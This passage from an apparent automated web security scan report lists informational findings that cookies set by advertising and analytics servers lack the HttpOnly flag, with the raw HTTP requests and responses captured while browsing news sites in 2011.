if(!__qc){var __qc={qcdst:function(){if(__qc.qctzoff(0)!=__qc.qctzoff(6))return 1;return 0;},qctzoff:function(m){var d1=new Date(2000,m,1,0,0,0,0);var t=d1.toGMTString();var d3=new Date(t.substring(0,
...[SNIP]...
10.59. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?[AQB]&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: f2nthevine.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_l8dx7Ebox7Ccdo=[CS]v4|0-0|4DC7F500[CE]; Expires=Sat, 7 May 2016 14:06:56 GMT; Domain=.112.2o7.net; Path=/
Location: http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?AQB=1&pccr=true&&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:56 GMT
Last-Modified: Tue, 10 May 2011 14:06:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain

10.60. http://floridatoday.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://floridatoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=13767 HTTP/1.1
Host: floridatoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvajK5QA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:41 GMT
Age: 0
Connection: keep-alive
Content-Length: 11706

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
10.61. http://gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/1273144/0/0/ADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn/3.0/5111.1/1273144/0/0/ADTECH;cfp=1;rndc=130494958;alias=fl-brevard.flatoday.com/news/article.htm_Interstitial;cookie=info;loc=100;target=_blank;grp=24711;misc=1304949586599;size=0;noperf=1 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; rsi_segs=D08734_70008|D08734_72078; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 367
Set-Cookie: JEB2=4DC7E58B6E651A440C6EAF39F000181A;expires=Wed, 8 May 2013 13:59:47 GMT;domain=gannett.gcion.com;path=/

GEL.thepage.bannerManager.add({
id: 'inter',
disabled: true,
expiry: String ( 24 - (new Date()).getHours() + "H" )
});


var adcount_1273144_1_=new
...[SNIP]...
10.62. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/896067/0/-1/ADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn/3.0/5111.1/896067/0/-1/ADTECH;cfp=1;rndc=130494958;alias=fl-brevard.flatoday.com/news/article.htm_728x90_1;cookie=info;loc=100;target=_blank;grp=24711;misc=1304949586596;size=728x90;noperf=1;key=Highly+publicized+murder+Caylee+Anthony+rivets+enrages;kvcw=;kvtitle=Highly-publicized-murder-of-Caylee-Anthony-rivets%2C-enrages HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; rsi_segs=D08734_70008|D08734_72078; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4DC7E58B6E651A440C6EAF39F000181A;expires=Wed, 8 May 2013 13:59:48 GMT;domain=gannett.gcion.com;path=/
Content-Length: 874

document.write("\n");
document.write("<scr"+"ipt language=\"JavaScript\" src=\"http://a.collective-media.net/adj/q1.q.gc.6170/news;sz=728x90;ord=949588532?\" type=\"text/javascript\">\n");
document.wr
...[SNIP]...
10.63. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gpaper114.112.2o7.net
Path:   /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519?AQB=1&pccr=true&&ndh=1&t=9/4/2011%208%3A59%3A45%201%20300&pageName=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%28201105080108%29&g=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&cc=USD&server=SAXO-GEL&events=event3&v1=gpaper114&v5=local_news&c6=news&c7=local_news&c11=/article/20110508/NEWS01/105080319&c16=article&c17=news&c23=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&c24=floridatoday.com&c25=gpaper114&c29=1&c44=/article/20110508/NEWS01/105080319&c48=no%20segments&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: gpaper114.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|0-0|4DC7F352[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:48 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_nyhylx7B88x3D=[CS]v4|26E3F9AA051612A9-400001A680400F96|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9AA051612A9-400001A680400F98|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 13:59:48 GMT
Last-Modified: Tue, 10 May 2011 13:59:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DC7F354-253C-40A45FE4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www652
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
10.64. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 302 Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Wed, 08-May-13 14:00:04 GMT
Cache-Control: private
X-Version: DataXu Pixel Tracker v3
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=535039&ev=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0

10.65. http://idpix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt1tr37; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh0v9kt00x3g020j0j50j; rdrlst=41i157rlklhm4000000043g0215smlkb5u20000000n3g0215sklkkpqq0000000c3g020hsnlkb5u20000000n3g020m7alkkxrb000000093g020x1blkkpqq0000000c3g020hsplkkpqq0000000c3g020m7flkkyyl000000073g0212gdlkkyy0000000083g020morlkkxrb000000093g021196lkkkbe0000000i3g021195lkkpqh0000000d3g021194lkkjj40000000j3g020dlxlkb5u20000000n3g020znmlk34620000000s3g021193lkkplo0000000f3g021192lkkpke0000000h3g020p46lkkpqq0000000c3g02008slklhm4000000043g020moylkl0r5000000053g020p1blkb5u20000000n3g0210tylkkpku0000000g3g020zr4lkb5u20000000n3g0200bvlk9pe80000000o3g0215xylk60qe0000000r3g0210poljyxb40000000u3g020e6llkl0r5000000053g0210telkd7nq0000000m3g020c9slk9pe80000000o3g0210rdlkdkly0000000k3g020mj2lkkxrb000000093g02159olk8fax0000000p3g020kualkkpqq0000000c3g020m0ulkl0r5000000053g020m45lkl0r5000000053g020m0plkkxrb000000093g020m40lkkxrb000000093g020mjelkkxrb000000093g0212qnlkkplt0000000e3g02167blkl0r5000000053g020bo8lkb5u20000000n3g020mjjlkl0r5000000053g021672lkkxrb000000093g020lw5lkb5u20000000n3g020ycrlkncow000000033g020zaalkb5u20000000n3g021203lkb5u20000000n3g02137rlkkpqq0000000c3g021204lkkyy0000000083g02137qlkb5u20000000n3g020afqlkb5u20000000n3g020o0vlkkpqx0000000b3g020z2ilkkxrb000000093g020ni1lkb5u20000000n3g02; sglst=20q0sag2lkd7nq0bnis00m3g020j0j50jc80lkb5u209jqc0063e000j00500c81lkkpke0000000h3g020j0h50ha6slkkpke0000000h3g020j0h50h0kllklhm4000000043g020j04504am5lkkxr8002zw00a3g020j0a50a9rslkkpke00s1q00h3g020j0h50h9q5lkb5u20abs200n3g020j0j50j0t7ljyxb40pxve00u3g020j0j50jdgflkkpke00s1q00h3g020j0h50hbo0lkb5u209jqc00n3g020j0j50jbo1lkkyy000io40083g020j08508aoplkb5u209jqc0063e000j00500d86lklhm4000000043g020j04504942lkb5u20abs200n3g020j0j50j8ndlkb5u20abs200n3g020j0j50j719lkb5u209jqc0063e000j0050071alkkpke00s1q00h3g020j0h50h56blkb5u20abs200n3g020j0j50jasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000023g020j025024wclkb5u209jqc0063e000j005008eklkkpke00s1q00h3g020j0h50h5mrlkb5u20abs200n3g020j0j50jbwjlkkyy000io40083g020j08508; vstcnt=417k010r0t4exp6103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924pq44103210a24eflo218e104203210724eyja103210e24mqca103210e24fvio118e10f24fz24103210924e8bw103210824fsuv103210924fduc118e10a24uzdp103210b24dret103210724gqhl103210923sti11hj10a24styu10321092451gt10pj10e24fj52103210924o2lt103210a24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zyf; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh13zyf00y3l010k0150k; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=41c157rlklhm4000000053l0115sklkkpqq0000000d3l010m7alkkxrb0000000a3l010x1blkkpqq0000000d3l010hsplkkpqq0000000d3l010m7flkkyyl000000083l0112gdlkkyy0000000093l010morlkkxrb0000000a3l011196lkkkbe0000000j3l011195lkkpqh0000000e3l011194lkkjj40000000k3l010dlxlkb5u20000000o3l010znmlk34620000000t3l011193lkkplo0000000g3l01008slklhm4000000053l010p46lkkpqq0000000d3l011192lkkpke0000000i3l0110tylkkpku0000000h3l010p1blkb5u20000000o3l010moylkl0r5000000063l0100bvlk9pe80000000p3l0115xylk60qe0000000s3l0110poljyxb40000000v3l010e6llkl0r5000000063l0110telkd7nq0000000n3l010c9slk9pe80000000p3l0110rdlkdkly0000000l3l010mj2lkkxrb0000000a3l01159olk8fax0000000q3l010kualkkpqq0000000d3l010m0ulkl0r5000000063l010m45lkl0r5000000063l010m0plkkxrb0000000a3l010m40lkkxrb0000000a3l010mjelkkxrb0000000a3l0112qnlkkplt0000000f3l01167blkl0r5000000063l010bo8lkb5u20000000o3l010mjjlkl0r5000000063l011672lkkxrb0000000a3l010lw5lkb5u20000000o3l010ycrlkncow000000043l011203lkb5u20000000o3l01137rlkkpqq0000000d3l011204lkkyy0000000093l010o0vlkkpqx0000000c3l010z2ilkkxrb0000000a3l010ni1lkb5u20000000o3l01; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: sglst=20q0sc80lkb5u209jqc0063e000j00500ag2lkd7nq0kdwe00n3l010k0150kc81lkkpke0000000i3l010k0150ia6slkkpke0000000i3l010k0150i9rslkkpke00s1q00i3l010k0150iam5lkkxr8002zw00b3l010k0150b0kllklhm4000000053l010k015059q5lkb5u20abs200o3l010k0150kdgflkkpke00s1q00i3l010k0150i0t7ljyxb40yo9000v3l010k0150kbo0lkb5u209jqc00o3l010k0150kbo1lkkyy000io40093l010k01509aoplkb5u209jqc0063e000j00500d86lklhm4000000053l010k01505942lkb5u20abs200o3l010k0150k8ndlkb5u20abs200o3l010k0150k719lkb5u209jqc0063e000j0050071alkkpke00s1q00i3l010k0150i56blkb5u20abs200o3l010k0150kasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000033l010k015034wclkb5u209jqc0063e000j005008eklkkpke00s1q00i3l010k0150i5mrlkb5u20abs200o3l010k0150kbwjlkkyy000io40093l010k01509; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: vstcnt=417k010r134exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Location: http://ad.yieldmanager.com/unpixel?t=2&id=1124652&id=726483&id=1274357&id=1230287&id=1097682&id=919037
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT

10.66. http://ie-stat.bmmetrix.com/V13a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /V13a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /V13a?http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html****true/1920x1200/16/irishtimes_ie/ie/UTF-8/1304949672361 HTTP/1.1
Host: ie-stat.bmmetrix.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:03:50 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: Cid=4bc9b72c8f416e9f502b1f6a19b57f41%3A1304949830; expires=Tue, 01 Jan 2030 00:00:00 GMT; path=/
Set-Cookie: Sid=2be59b06d773b1fb5d3996973908bea1%3A1304951630; path=/
Location: http://ie-stat.bmmetrix.com/V13b?http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html****true/1920x1200/16/irishtimes_ie/ie/UTF-8/1304949672361
Content-Length: 365
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ie-stat.bmmetrix.com/V13b?http%3A%2F%2Fw
...[SNIP]...
10.67. http://ie-stat.bmmetrix.com/V13b  previous  next

Summary

